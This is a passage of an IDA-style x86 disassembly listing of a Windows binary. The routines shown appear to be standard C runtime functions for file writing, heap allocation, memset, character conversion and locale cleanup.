loc_41BFF2: ; CODE XREF: sub_41BF3B+8E�j
mov edi, eax
lea eax, [ebp+var_420]
sub edi, eax
push 0
lea eax, [ebp+var_1C]
push eax
push edi
lea eax, [ebp+var_420]
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call ds:dword_420040 ; WriteFile
test eax, eax
jz short loc_41C032
mov eax, [ebp+var_1C]
add [ebp+var_14], eax
cmp eax, edi
jl short loc_41C03B
mov eax, [ebp+var_10]
sub eax, [ebp+arg_4]
xor edi, edi
cmp eax, [ebp+arg_8]
jb short loc_41BFB7
jmp short loc_41C03D
; ---------------------------------------------------------------------------
loc_41C032: ; CODE XREF: sub_41BF3B+DC�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov [ebp+var_8], eax
loc_41C03B: ; CODE XREF: sub_41BF3B+E6�j
xor edi, edi
loc_41C03D: ; CODE XREF: sub_41BF3B+F5�j
; sub_41BF3B+14E�j ...
mov eax, [ebp+var_14]
cmp eax, edi
jnz loc_41C0CD
cmp [ebp+var_8], edi
jz short loc_41C0A4
push 5
pop esi
cmp [ebp+var_8], esi
jnz short loc_41C096
call sub_419600
mov dword ptr [eax], 9
call sub_419609
mov [eax], esi
jmp short loc_41C09F
; ---------------------------------------------------------------------------
loc_41C069: ; CODE XREF: sub_41BF3B+64�j
push edi
lea ecx, [ebp+var_1C]
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push dword ptr [eax]
call ds:dword_420040 ; WriteFile
test eax, eax
jz short loc_41C08B
mov eax, [ebp+var_1C]
mov [ebp+var_8], edi
mov [ebp+var_14], eax
jmp short loc_41C03D
; ---------------------------------------------------------------------------
loc_41C08B: ; CODE XREF: sub_41BF3B+143�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov [ebp+var_8], eax
jmp short loc_41C03D
; ---------------------------------------------------------------------------
loc_41C096: ; CODE XREF: sub_41BF3B+118�j
push [ebp+var_8]
call sub_419612
pop ecx
loc_41C09F: ; CODE XREF: sub_41BF3B+12C�j
; sub_41BF3B+190�j
or eax, 0FFFFFFFFh
jmp short loc_41C0D0
; ---------------------------------------------------------------------------
loc_41C0A4: ; CODE XREF: sub_41BF3B+76�j
; sub_41BF3B+110�j
mov eax, [ebx]
test byte ptr [eax+esi+4], 40h
jz short loc_41C0B9
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 1Ah
jnz short loc_41C0B9
xor eax, eax
jmp short loc_41C0D0
; ---------------------------------------------------------------------------
loc_41C0B9: ; CODE XREF: sub_41BF3B+170�j
; sub_41BF3B+178�j
call sub_419600
mov dword ptr [eax], 1Ch
call sub_419609
mov [eax], edi
jmp short loc_41C09F
; ---------------------------------------------------------------------------
loc_41C0CD: ; CODE XREF: sub_41BF3B+107�j
sub eax, [ebp+var_18]
loc_41C0D0: ; CODE XREF: sub_41BF3B+167�j
; sub_41BF3B+17C�j
pop esi
pop ebx
loc_41C0D2: ; CODE XREF: sub_41BF3B+24�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
call sub_41A1F6
leave
retn
sub_41BF3B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C0E0 proc near ; CODE XREF: sub_4164BB+98�p
; sub_4164BB+EB�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0041C16F SIZE 0000001C BYTES
push 0Ch
push offset stru_429930
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_47C618
jnb short loc_41C16F
mov eax, ebx
sar eax, 5
lea edi, ds:47C620h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41C16F
push ebx
call sub_41CD5C
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41C13F
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_41BF3B
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_41C156
; ---------------------------------------------------------------------------
loc_41C13F: ; CODE XREF: sub_41C0E0+49�j
call sub_419600
mov dword ptr [eax], 9
call sub_419609
and dword ptr [eax], 0
or [ebp+var_1C], 0FFFFFFFFh
loc_41C156: ; CODE XREF: sub_41C0E0+5D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41C167
mov eax, [ebp+var_1C]
jmp short loc_41C185
sub_41C0E0 endp
; =============== S U B R O U T I N E =======================================
sub_41C164 proc near ; DATA XREF: .rdata:stru_429930�o
mov ebx, [ebp+8]
sub_41C164 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41C167 proc near ; CODE XREF: sub_41C0E0+7A�p
push ebx
call sub_41CDCF
pop ecx
retn
sub_41C167 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41C0E0
loc_41C16F: ; CODE XREF: sub_41C0E0+15�j
; sub_41C0E0+35�j
call sub_419600
mov dword ptr [eax], 9
call sub_419609
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41C185: ; CODE XREF: sub_41C0E0+82�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41C0E0
; =============== S U B R O U T I N E =======================================
sub_41C18B proc near ; CODE XREF: sub_4164BB+6F�p
; sub_418DD9+34�p ...
arg_0 = dword ptr 4
inc dword_47C200
push 1000h
call sub_414E7D
test eax, eax
pop ecx
mov ecx, [esp+arg_0]
mov [ecx+8], eax
jz short loc_41C1B4
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_41C1C5
; ---------------------------------------------------------------------------
loc_41C1B4: ; CODE XREF: sub_41C18B+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_41C1C5: ; CODE XREF: sub_41C18B+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_41C18B endp
; =============== S U B R O U T I N E =======================================
sub_41C1CF proc near ; CODE XREF: sub_4164BB+64�p
; sub_41AB2C+8�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_47C618
jb short loc_41C1DE
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41C1DE: ; CODE XREF: sub_41C1CF+A�j
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_47C620[ecx*4]
lea eax, [eax+eax*8]
movsx eax, byte ptr [ecx+eax*4+4]
and eax, 40h
retn
sub_41C1CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C1F9 proc near ; CODE XREF: sub_41C259+1E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = word ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
push esi
xor esi, esi
cmp ecx, esi
jnz short loc_41C20A
xor eax, eax
jmp short loc_41C256
; ---------------------------------------------------------------------------
loc_41C20A: ; CODE XREF: sub_41C1F9+B�j
mov eax, [ebp+arg_0]
cmp [eax+14h], esi
jnz short loc_41C223
mov ax, [ebp+arg_8]
cmp ax, 0FFh
ja short loc_41C248
mov [ecx], al
xor eax, eax
inc eax
jmp short loc_41C256
; ---------------------------------------------------------------------------
loc_41C223: ; CODE XREF: sub_41C1F9+17�j
lea edx, [ebp+arg_4]
push edx
push esi
push dword ptr [eax+28h]
mov [ebp+arg_4], esi
push ecx
push 1
lea ecx, [ebp+arg_8]
push ecx
push esi
push dword ptr [eax+4]
call ds:dword_4200D8 ; WideCharToMultiByte
cmp eax, esi
jz short loc_41C248
cmp [ebp+arg_4], esi
jz short loc_41C256
loc_41C248: ; CODE XREF: sub_41C1F9+21�j
; sub_41C1F9+48�j
call sub_419600
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
loc_41C256: ; CODE XREF: sub_41C1F9+F�j
; sub_41C1F9+28�j ...
pop esi
pop ebp
retn
sub_41C1F9 endp
; =============== S U B R O U T I N E =======================================
sub_41C259 proc near ; CODE XREF: sub_416662+317�p
; sub_416662+6F7�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
call sub_416E15
mov eax, [eax+64h]
cmp eax, off_42D83C
jz short loc_41C26E
call sub_417C4E
loc_41C26E: ; CODE XREF: sub_41C259+E�j
push [esp+arg_4]
push [esp+4+arg_0]
push eax
call sub_41C1F9
add esp, 0Ch
retn
sub_41C259 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C280 proc near ; CODE XREF: sub_416E15+23�p
; sub_416E86+29�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0041C333 SIZE 00000008 BYTES
push 10h
push offset stru_429940
call __SEH_prolog
mov esi, [ebp+arg_0]
imul esi, [ebp+arg_4]
mov [ebp+var_1C], esi
test esi, esi
jnz short loc_41C29B
inc esi
loc_41C29B: ; CODE XREF: sub_41C280+18�j
; sub_41C280+9F�j
xor edi, edi
mov [ebp+var_20], edi
cmp esi, 0FFFFFFE0h
ja short loc_41C30A
cmp dword_47C980, 3
jnz short loc_41C2F5
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
mov ebx, [ebp+var_1C]
cmp ebx, dword_47C96C
ja short loc_41C2F5
push 4
call sub_418285
pop ecx
and [ebp+ms_exc.disabled], edi
push ebx
call sub_418ADD
pop ecx
mov [ebp+var_20], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41C32A
mov edi, [ebp+var_20]
test edi, edi
jz short loc_41C2F9
push [ebp+var_1C]
push 0
push edi
call sub_41C550
add esp, 0Ch
loc_41C2F5: ; CODE XREF: sub_41C280+2C�j
; sub_41C280+40�j
test edi, edi
jnz short loc_41C333
loc_41C2F9: ; CODE XREF: sub_41C280+65�j
push esi
push 8
push dword_47C97C
call ds:dword_42005C ; RtlAllocateHeap
mov edi, eax
loc_41C30A: ; CODE XREF: sub_41C280+23�j
test edi, edi
jnz short loc_41C333
cmp dword_47C35C, edi
jz short loc_41C333
push esi
call sub_41947D
pop ecx
test eax, eax
jnz loc_41C29B
jmp short loc_41C335
sub_41C280 endp
; =============== S U B R O U T I N E =======================================
sub_41C327 proc near ; DATA XREF: .rdata:stru_429940�o
mov esi, [ebp+0Ch]
sub_41C327 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41C32A proc near ; CODE XREF: sub_41C280+5B�p
push 4
call sub_4181F1
pop ecx
retn
sub_41C32A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41C280
loc_41C333: ; CODE XREF: sub_41C280+77�j
; sub_41C280+8C�j ...
mov eax, edi
loc_41C335: ; CODE XREF: sub_41C280+A5�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41C280
; =============== S U B R O U T I N E =======================================
sub_41C33B proc near ; CODE XREF: sub_416F0B+CF�p
; sub_416F0B+301�p ...
arg_0 = dword ptr 4
call sub_416E15
mov eax, [eax+64h]
cmp eax, off_42D83C
jz short loc_41C350
call sub_417C4E
loc_41C350: ; CODE XREF: sub_41C33B+E�j
cmp dword ptr [eax+28h], 1
jle short loc_41C366
push 4
push [esp+4+arg_0]
push eax
call sub_417A4B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_41C366: ; CODE XREF: sub_41C33B+19�j
mov eax, [eax+48h]
mov ecx, [esp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 4
retn
sub_41C33B endp
; =============== S U B R O U T I N E =======================================
sub_41C375 proc near ; CODE XREF: sub_416F0B+840�p
; sub_416F0B+922�p
arg_0 = dword ptr 4
call sub_416E15
mov eax, [eax+64h]
cmp eax, off_42D83C
jz short loc_41C38A
call sub_417C4E
loc_41C38A: ; CODE XREF: sub_41C375+E�j
cmp dword ptr [eax+28h], 1
jle short loc_41C3A3
push 80h
push [esp+4+arg_0]
push eax
call sub_417A4B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_41C3A3: ; CODE XREF: sub_41C375+19�j
mov eax, [eax+48h]
mov ecx, [esp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 80h
retn
sub_41C375 endp
; =============== S U B R O U T I N E =======================================
sub_41C3B4 proc near ; CODE XREF: sub_416F0B+3F�p
; sub_416F0B+5A�p ...
arg_0 = dword ptr 4
call sub_416E15
mov eax, [eax+64h]
cmp eax, off_42D83C
jz short loc_41C3C9
call sub_417C4E
loc_41C3C9: ; CODE XREF: sub_41C3B4+E�j
cmp dword ptr [eax+28h], 1
jle short loc_41C3DF
push 8
push [esp+4+arg_0]
push eax
call sub_417A4B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_41C3DF: ; CODE XREF: sub_41C3B4+19�j
mov eax, [eax+48h]
mov ecx, [esp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 8
retn
sub_41C3B4 endp
; =============== S U B R O U T I N E =======================================
sub_41C3EE proc near ; CODE XREF: sub_416F0B+6D�p
; sub_416F0B+3DC�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
cmp ebx, 0FFFFFFFFh
push esi
jz short loc_41C43A
mov esi, [esp+8+arg_4]
mov eax, [esi+0Ch]
test al, 1
jnz short loc_41C40C
test al, al
jns short loc_41C43A
test al, 2
jnz short loc_41C43A
loc_41C40C: ; CODE XREF: sub_41C3EE+14�j
cmp dword ptr [esi+8], 0
jnz short loc_41C419
push esi
call sub_41C18B
pop ecx
loc_41C419: ; CODE XREF: sub_41C3EE+22�j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_41C429
cmp dword ptr [esi+4], 0
jnz short loc_41C43A
inc eax
mov [esi], eax
loc_41C429: ; CODE XREF: sub_41C3EE+30�j
dec dword ptr [esi]
test byte ptr [esi+0Ch], 40h
mov eax, [esi]
jz short loc_41C440
cmp [eax], bl
jz short loc_41C442
inc eax
mov [esi], eax
loc_41C43A: ; CODE XREF: sub_41C3EE+9�j
; sub_41C3EE+18�j ...
or eax, 0FFFFFFFFh
loc_41C43D: ; CODE XREF: sub_41C3EE+6A�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41C440: ; CODE XREF: sub_41C3EE+43�j
mov [eax], bl
loc_41C442: ; CODE XREF: sub_41C3EE+47�j
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and eax, 0FFFFFFEFh
or eax, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_41C43D
sub_41C3EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C45A proc near ; CODE XREF: sub_41C51A+22�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
xor ebx, ebx
cmp edi, ebx
jz short loc_41C47E
cmp [ebp+arg_C], ebx
jz short loc_41C47E
mov al, [edi]
cmp al, bl
jnz short loc_41C485
mov eax, [ebp+arg_4]
cmp eax, ebx
jz short loc_41C47E
mov [eax], bx
loc_41C47E: ; CODE XREF: sub_41C45A+D�j
; sub_41C45A+12�j ...
xor eax, eax
loc_41C480: ; CODE XREF: sub_41C45A+44�j
; sub_41C45A+8D�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41C485: ; CODE XREF: sub_41C45A+18�j
mov esi, [ebp+arg_0]
cmp [esi+14h], ebx
jnz short loc_41C4A0
mov ecx, [ebp+arg_4]
cmp ecx, ebx
jz short loc_41C49B
movzx ax, al
mov [ecx], ax
loc_41C49B: ; CODE XREF: sub_41C45A+38�j
; sub_41C45A+AB�j
xor eax, eax
inc eax
jmp short loc_41C480
; ---------------------------------------------------------------------------
loc_41C4A0: ; CODE XREF: sub_41C45A+31�j
mov ecx, [esi+48h]
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41C4E9
mov eax, [esi+28h]
cmp eax, 1
jle short loc_41C4D7
cmp [ebp+arg_C], eax
jl short loc_41C4D7
xor ecx, ecx
cmp [ebp+arg_4], ebx
setnz cl
push ecx
push [ebp+arg_4]
push eax
push edi
push 9
push dword ptr [esi+4]
call ds:dword_4200D4 ; MultiByteToWideChar
test eax, eax
jnz short loc_41C4E4
loc_41C4D7: ; CODE XREF: sub_41C45A+59�j
; sub_41C45A+5E�j
mov eax, [ebp+arg_C]
cmp eax, [esi+28h]
jb short loc_41C507
cmp [edi+1], bl
jz short loc_41C507
loc_41C4E4: ; CODE XREF: sub_41C45A+7B�j
mov eax, [esi+28h]
jmp short loc_41C480
; ---------------------------------------------------------------------------
loc_41C4E9: ; CODE XREF: sub_41C45A+51�j
xor eax, eax
cmp [ebp+arg_4], ebx
setnz al
push eax
push [ebp+arg_4]
push 1
push edi
push 9
push dword ptr [esi+4]
call ds:dword_4200D4 ; MultiByteToWideChar
test eax, eax
jnz short loc_41C49B
loc_41C507: ; CODE XREF: sub_41C45A+83�j
; sub_41C45A+88�j
call sub_419600
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp loc_41C480
sub_41C45A endp
; =============== S U B R O U T I N E =======================================
sub_41C51A proc near ; CODE XREF: sub_416F0B+68F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
call sub_416E15
mov eax, [eax+64h]
cmp eax, off_42D83C
jz short loc_41C52F
call sub_417C4E
loc_41C52F: ; CODE XREF: sub_41C51A+E�j
push [esp+arg_8]
push [esp+4+arg_4]
push [esp+8+arg_0]
push eax
call sub_41C45A
add esp, 10h
retn
sub_41C51A endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41C550 proc near ; CODE XREF: sub_416F0B+512�p
; sub_4199C5+8C�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_41C5AB
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_41C59B
neg ecx
and ecx, 3
jz short loc_41C57D
sub edx, ecx
loc_41C573: ; CODE XREF: sub_41C550+2B�j
mov [edi], al
add edi, 1
sub ecx, 1
jnz short loc_41C573
loc_41C57D: ; CODE XREF: sub_41C550+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_41C59B
rep stosd
test edx, edx
jz short loc_41C5A5
loc_41C59B: ; CODE XREF: sub_41C550+18�j
; sub_41C550+43�j ...
mov [edi], al
add edi, 1
sub edx, 1
jnz short loc_41C59B
loc_41C5A5: ; CODE XREF: sub_41C550+49�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41C5AB: ; CODE XREF: sub_41C550+A�j
mov eax, [esp+arg_0]
retn
sub_41C550 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C5B0 proc near ; CODE XREF: sub_417A4B+60�p
; sub_41AC36+A4�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push 1Ch
push offset stru_429950
call __SEH_prolog
xor esi, esi
cmp dword_47C484, esi
jnz short loc_41C5FB
lea eax, [ebp+var_1C]
push eax
xor edi, edi
inc edi
push edi
push offset dword_4290B0
push edi
call ds:dword_420154 ; GetStringTypeW
test eax, eax
jz short loc_41C5E6
mov dword_47C484, edi
jmp short loc_41C5FB
; ---------------------------------------------------------------------------
loc_41C5E6: ; CODE XREF: sub_41C5B0+2C�j
call ds:dword_420008 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_41C5FB
mov dword_47C484, 2
loc_41C5FB: ; CODE XREF: sub_41C5B0+14�j
; sub_41C5B0+34�j ...
mov eax, dword_47C484
cmp eax, 2
jz loc_41C6F3
cmp eax, esi
jz loc_41C6F3
cmp eax, 1
jnz loc_41C719
mov [ebp+var_20], esi
mov [ebp+var_24], esi
cmp [ebp+arg_10], esi
jnz short loc_41C62D
mov eax, dword_47C4D0
mov [ebp+arg_10], eax
loc_41C62D: ; CODE XREF: sub_41C5B0+73�j
push esi
push esi
push [ebp+arg_8]
push [ebp+arg_4]
xor eax, eax
cmp [ebp+arg_18], esi
setnz al
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_10]
call ds:dword_4200D4 ; MultiByteToWideChar
mov edi, eax
mov [ebp+var_28], edi
test edi, edi
jz loc_41C719
and [ebp+ms_exc.disabled], 0
lea ebx, [edi+edi]
mov eax, ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_414800
mov [ebp+ms_exc.old_esp], esp
mov esi, esp
mov [ebp+var_2C], esi
push ebx
push 0
push esi
call sub_41C550
add esp, 0Ch
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41C69E
; ---------------------------------------------------------------------------
loc_41C689: ; DATA XREF: .rdata:stru_429950�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41C68D: ; DATA XREF: .rdata:stru_429950�o
mov esp, [ebp+ms_exc.old_esp]
call sub_419D38
xor esi, esi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_28]
loc_41C69E: ; CODE XREF: sub_41C5B0+D7�j
test esi, esi
jnz short loc_41C6B9
push edi
push 2
call sub_41C280
pop ecx
pop ecx
mov esi, eax
test esi, esi
jz short loc_41C719
mov [ebp+var_24], 1
loc_41C6B9: ; CODE XREF: sub_41C5B0+F0�j
push edi
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call ds:dword_4200D4 ; MultiByteToWideChar
test eax, eax
jz short loc_41C6E1
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call ds:dword_420154 ; GetStringTypeW
mov [ebp+var_20], eax
loc_41C6E1: ; CODE XREF: sub_41C5B0+11E�j
cmp [ebp+var_24], 0
jz short loc_41C6EE
push esi
call sub_414A14
pop ecx
loc_41C6EE: ; CODE XREF: sub_41C5B0+135�j
mov eax, [ebp+var_20]
jmp short loc_41C761
; ---------------------------------------------------------------------------
loc_41C6F3: ; CODE XREF: sub_41C5B0+53�j
; sub_41C5B0+5B�j
mov ebx, [ebp+arg_14]
cmp ebx, esi
jnz short loc_41C700
mov ebx, dword_47C4C0
loc_41C700: ; CODE XREF: sub_41C5B0+148�j
mov edi, [ebp+arg_10]
test edi, edi
jnz short loc_41C70D
mov edi, dword_47C4D0
loc_41C70D: ; CODE XREF: sub_41C5B0+155�j
push ebx
call sub_41DF57
pop ecx
cmp eax, 0FFFFFFFFh
jnz short loc_41C71D
loc_41C719: ; CODE XREF: sub_41C5B0+64�j
; sub_41C5B0+A5�j ...
xor eax, eax
jmp short loc_41C761
; ---------------------------------------------------------------------------
loc_41C71D: ; CODE XREF: sub_41C5B0+167�j
cmp eax, edi
jz short loc_41C73F
push 0
push 0
lea ecx, [ebp+arg_8]
push ecx
push [ebp+arg_4]
push eax
push edi
call sub_41DFA0
add esp, 18h
mov esi, eax
test esi, esi
jz short loc_41C719
mov [ebp+arg_4], esi
loc_41C73F: ; CODE XREF: sub_41C5B0+16F�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push ebx
call ds:dword_4201D4 ; GetStringTypeA
mov edi, eax
test esi, esi
jz short loc_41C75F
push esi
call sub_414A14
pop ecx
loc_41C75F: ; CODE XREF: sub_41C5B0+1A6�j
mov eax, edi
loc_41C761: ; CODE XREF: sub_41C5B0+141�j
; sub_41C5B0+16B�j
lea esp, [ebp-38h]
call __SEH_epilog
retn
sub_41C5B0 endp
; =============== S U B R O U T I N E =======================================
sub_41C76A proc near ; CODE XREF: sub_417AC2+B1�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz loc_41C8F8
push dword ptr [esi+4]
call sub_414A14
push dword ptr [esi+8]
call sub_414A14
push dword ptr [esi+0Ch]
call sub_414A14
push dword ptr [esi+10h]
call sub_414A14
push dword ptr [esi+14h]
call sub_414A14
push dword ptr [esi+18h]
call sub_414A14
push dword ptr [esi]
call sub_414A14
push dword ptr [esi+20h]
call sub_414A14
push dword ptr [esi+24h]
call sub_414A14
push dword ptr [esi+28h]
call sub_414A14
push dword ptr [esi+2Ch]
call sub_414A14
push dword ptr [esi+30h]
call sub_414A14
push dword ptr [esi+34h]
call sub_414A14
push dword ptr [esi+1Ch]
call sub_414A14
push dword ptr [esi+38h]
call sub_414A14
push dword ptr [esi+3Ch]
call sub_414A14
add esp, 40h
push dword ptr [esi+40h]
call sub_414A14
push dword ptr [esi+44h]
call sub_414A14
push dword ptr [esi+48h]
call sub_414A14
push dword ptr [esi+4Ch]
call sub_414A14
push dword ptr [esi+50h]
call sub_414A14
push dword ptr [esi+54h]
call sub_414A14
push dword ptr [esi+58h]
call sub_414A14
push dword ptr [esi+5Ch]
call sub_414A14
push dword ptr [esi+60h]
call sub_414A14
push dword ptr [esi+64h]
call sub_414A14
push dword ptr [esi+68h]
call sub_414A14
push dword ptr [esi+6Ch]
call sub_414A14
push dword ptr [esi+70h]
call sub_414A14
push dword ptr [esi+74h]
call sub_414A14
push dword ptr [esi+78h]
call sub_414A14
push dword ptr [esi+7Ch]
call sub_414A14
add esp, 40h
push dword ptr [esi+80h]
call sub_414A14
push dword ptr [esi+84h]
call sub_414A14
push dword ptr [esi+88h]
call sub_414A14
push dword ptr [esi+8Ch]
call sub_414A14
push dword ptr [esi+90h]
call sub_414A14
push dword ptr [esi+94h]
call sub_414A14
push dword ptr [esi+98h]
call sub_414A14
push dword ptr [esi+9Ch]
call sub_414A14
push dword ptr [esi+0A0h]
call sub_414A14
push dword ptr [esi+0A4h]
call sub_414A14
push dword ptr [esi+0A8h]
call sub_414A14
add esp, 2Ch
loc_41C8F8: ; CODE XREF: sub_41C76A+7�j
pop esi
retn
sub_41C76A endp
; =============== S U B R O U T I N E =======================================
sub_41C8FA proc near ; CODE XREF: sub_417AC2+5D�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_41C957
mov eax, [esi]
mov ecx, off_42E1F4
cmp eax, [ecx]
jz short loc_41C91E
cmp eax, off_42E1C4
jz short loc_41C91E
push eax
call sub_414A14
pop ecx
loc_41C91E: ; CODE XREF: sub_41C8FA+13�j
; sub_41C8FA+1B�j
mov eax, [esi+4]
mov ecx, off_42E1F4
cmp eax, [ecx+4]
jz short loc_41C93B
cmp eax, off_42E1C8
jz short loc_41C93B
push eax
call sub_414A14
pop ecx
loc_41C93B: ; CODE XREF: sub_41C8FA+30�j
; sub_41C8FA+38�j
mov esi, [esi+8]
mov eax, off_42E1F4
cmp esi, [eax+8]
jz short loc_41C957
cmp esi, off_42E1CC
jz short loc_41C957
push esi
call sub_414A14
pop ecx
loc_41C957: ; CODE XREF: sub_41C8FA+7�j
; sub_41C8FA+4C�j ...
pop esi
retn
sub_41C8FA endp
; =============== S U B R O U T I N E =======================================
sub_41C959 proc near ; CODE XREF: sub_417AC2+3A�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz loc_41CA30
mov eax, [esi+0Ch]
mov ecx, off_42E1F4
cmp eax, [ecx+0Ch]
jz short loc_41C983
cmp eax, off_42E1D0
jz short loc_41C983
push eax
call sub_414A14
pop ecx
loc_41C983: ; CODE XREF: sub_41C959+19�j
; sub_41C959+21�j
mov eax, [esi+10h]
mov ecx, off_42E1F4
cmp eax, [ecx+10h]
jz short loc_41C9A0
cmp eax, off_42E1D4
jz short loc_41C9A0
push eax
call sub_414A14
pop ecx
loc_41C9A0: ; CODE XREF: sub_41C959+36�j
; sub_41C959+3E�j
mov eax, [esi+14h]
mov ecx, off_42E1F4
cmp eax, [ecx+14h]
jz short loc_41C9BD
cmp eax, off_42E1D8
jz short loc_41C9BD
push eax
call sub_414A14
pop ecx
loc_41C9BD: ; CODE XREF: sub_41C959+53�j
; sub_41C959+5B�j
mov eax, [esi+18h]
mov ecx, off_42E1F4
cmp eax, [ecx+18h]
jz short loc_41C9DA
cmp eax, off_42E1DC
jz short loc_41C9DA
push eax
call sub_414A14
pop ecx
loc_41C9DA: ; CODE XREF: sub_41C959+70�j
; sub_41C959+78�j
mov eax, [esi+1Ch]
mov ecx, off_42E1F4
cmp eax, [ecx+1Ch]
jz short loc_41C9F7
cmp eax, off_42E1E0
jz short loc_41C9F7
push eax
call sub_414A14
pop ecx
loc_41C9F7: ; CODE XREF: sub_41C959+8D�j
; sub_41C959+95�j
mov eax, [esi+20h]
mov ecx, off_42E1F4
cmp eax, [ecx+20h]
jz short loc_41CA14
cmp eax, off_42E1E4
jz short loc_41CA14
push eax
call sub_414A14
pop ecx
loc_41CA14: ; CODE XREF: sub_41C959+AA�j
; sub_41C959+B2�j
mov esi, [esi+24h]
mov eax, off_42E1F4
cmp esi, [eax+24h]
jz short loc_41CA30
cmp esi, off_42E1E8
